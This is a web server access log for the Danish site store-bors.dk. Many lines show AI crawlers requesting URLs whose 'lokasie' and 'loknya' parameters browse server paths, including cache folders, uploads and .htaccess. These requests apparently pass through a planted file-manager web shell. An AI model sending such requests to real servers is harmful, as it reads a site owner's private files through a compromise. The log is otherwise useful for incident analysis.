216.73.216.125 - - [29/Jul/2026:08:41:15 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2Fbg-150x150.jpg.webp&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 2637 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:15 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/b/a HTTP/2" 200 2066 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:15 +0200] "GET /index.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F3%2Fb%2F2%2F3b2c63eaf9cc9de2&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F3%2Fb%2F2 HTTP/2" 200 19730 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:15 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F5%2F7%2F5 HTTP/2" 200 1977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:15 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/b/b/3/bb3ac9353b3b8414&loknya=/var/www/vhosts/store-bors.dk/./lscache/b/b/3 HTTP/2" 200 25877 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/b/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:16 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F1%2F0%2Fd HTTP/2" 200 2001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:16 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/d HTTP/2" 200 1998 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.46 - - [29/Jul/2026:08:41:16 +0200] "GET /category-sitemap.xml?lokasie=/var/www/vhosts/store-bors.dk/lscache/7/b/7/7b78a8182fa20857&loknya=/var/www/vhosts/store-bors.dk/lscache/7/b/7 HTTP/2" 200 19453 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.125 - - [29/Jul/2026:08:41:16 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Ff%2Fc%2F6 HTTP/2" 200 1989 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:16 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2F.%2Flscache%2F1 HTTP/2" 200 2226 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:16 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flsahe%2F1%2F6%2F HTTP/2" 200 1780 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:17 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates/popup-newsletter.json&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates HTTP/2" 200 3442 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:17 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/e/a HTTP/2" 200 2052 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:17 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fpriv%2F HTTP/2" 200 2181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:17 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2F%2Fex.php&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2F HTTP/2" 200 4522 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:17 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates/popup-velkomststilbud.json&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates HTTP/2" 200 3151 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/template-kits/e1e19e16487d3cca579c2bce43d656af/templates" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:17 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_2015-150x150.jpg.webp&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 6396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:17 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lsahe/a/2/ HTTP/2" 200 1779 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:17 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F9%2F9%2F1 HTTP/2" 200 2022 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:18 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2F3%2Fc HTTP/2" 200 2093 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:18 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/e/5/c/e5c676e8e98e057a&loknya=/var/www/vhosts/store-bors.dk/./lscache/e/5/c HTTP/2" 200 19577 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/e/5/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:18 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F1%2F8%2Fd HTTP/2" 200 2003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:18 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b/8/ HTTP/2" 200 1781 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/8/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:18 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstor-bors.dk%2F.%2Flscach%2F1%2F3%2F HTTP/2" 200 1783 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:18 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2Fe%2F0 HTTP/2" 200 1988 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:18 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/e/3/c/e3c9443a38eb13b0&loknya=/var/www/vhosts/store-bors.dk/./lscache/e/3/c HTTP/2" 200 25879 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/e/3/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fe%2Fd%2F0 HTTP/2" 200 1985 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:19 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/3/b/a HTTP/2" 200 2102 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/3/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:19 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fb%2F6%2F3 HTTP/2" 200 1983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:19 +0200] "GET /index.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2Fb%2Fd%2F4bdd4e56530122e1&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2Fb%2Fd HTTP/2" 200 1860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:19 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/6/e/e/6ee9e8e04be29605&loknya=/var/www/vhosts/store-bors.dk/./lscache/6/e/e HTTP/2" 200 19704 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/6/e/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:19 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/c/c HTTP/2" 200 1997 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/2/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fe%2Fe%2F2 HTTP/2" 200 2044 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:19 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2F.%2Flscache%2Fpriv HTTP/2" 200 2189 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:20 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/c/e HTTP/2" 200 1999 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:20 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/c/4/a/c4a03d02214ecce8&loknya=/var/www/vhosts/store-bors.dk/./lscache/c/4/a HTTP/2" 200 24610 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/c/4/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:20 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2F0%2Fe HTTP/2" 200 2152 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:20 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F0%2Fd%2Fe HTTP/2" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:20 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F7%2Fc%2Fd HTTP/2" 200 2001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:20 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/9/c/ HTTP/2" 200 1779 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/9/c/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:20 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/b/3/8/b38eb9975eeb8cbc&loknya=/var/www/vhosts/store-bors.dk/./lscache/b/3/8 HTTP/2" 200 20424 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/b/3/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:20 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F3%2Fe HTTP/2" 200 2147 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:21 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates%2Fsearch.html&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fthemes%2Ftwentytwentyfive%2Ftemplates HTTP/2" 200 1828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:21 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2Fe%2F8 HTTP/2" 200 1990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:21 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/6/a/d HTTP/2" 200 1999 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/6/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:21 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/./lscache/1/7/a/17ad265ee01caa6a&loknya=/var/www/vhosts/store-bors.dk/./lscache/1/7/a HTTP/2" 200 19625 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/1/7/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:21 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs%2Fsvg-painter.min.js&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/2" 200 2338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:21 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2F5%2F2 HTTP/2" 200 1991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:22 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2F4%2F2 HTTP/2" 200 1988 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:22 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2/a HTTP/2" 200 2001 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:22 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/placeholder-1-150x150.png.webp&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads HTTP/2" 200 2140 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:22 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Ff%2Fa HTTP/2" 200 2123 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:22 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2F8%2Fe HTTP/2" 200 2003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:22 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2Fa%2Fc HTTP/2" 200 2002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:22 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/7/b/ HTTP/2" 200 1781 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/b/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:22 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/placeholder-2-300x200.png.webp&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads HTTP/2" 200 2594 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:22 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fa%2F5%2Fc HTTP/2" 200 2002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:23 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2Ff HTTP/2" 200 2100 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:23 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Ff%2F4%2F0 HTTP/2" 200 2039 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:23 +0200] "GET /?loknya=/var/www/vhosts/store-bors.k/./lscache/a/6/ HTTP/2" 200 1782 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/6/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:23 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/placeholder-1-300x200.png.webp&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads HTTP/2" 200 2640 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:23 +0200] "GET /privatlivspolitik/?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins%2Fakismet-da_DK.po&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Fhttpdocs%2Fwp-content%2Flanguages%2Fplugins HTTP/2" 200 8547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:23 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_2013-1-scaled.jpg&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 253877 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:24 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/8/e/ HTTP/2" 200 1784 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/8/e/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:24 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads/placeholder-3-300x200.png.webp&loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads HTTP/2" 200 2640 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/httpdocs/wp-content/uploads" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:24 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_2028-scaled.jpg&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 127350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:24 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs%2F.htaccess&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F%2Fhttpdocs HTTP/2" 200 2331 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:24 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2F0%2Ff HTTP/2" 200 2088 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
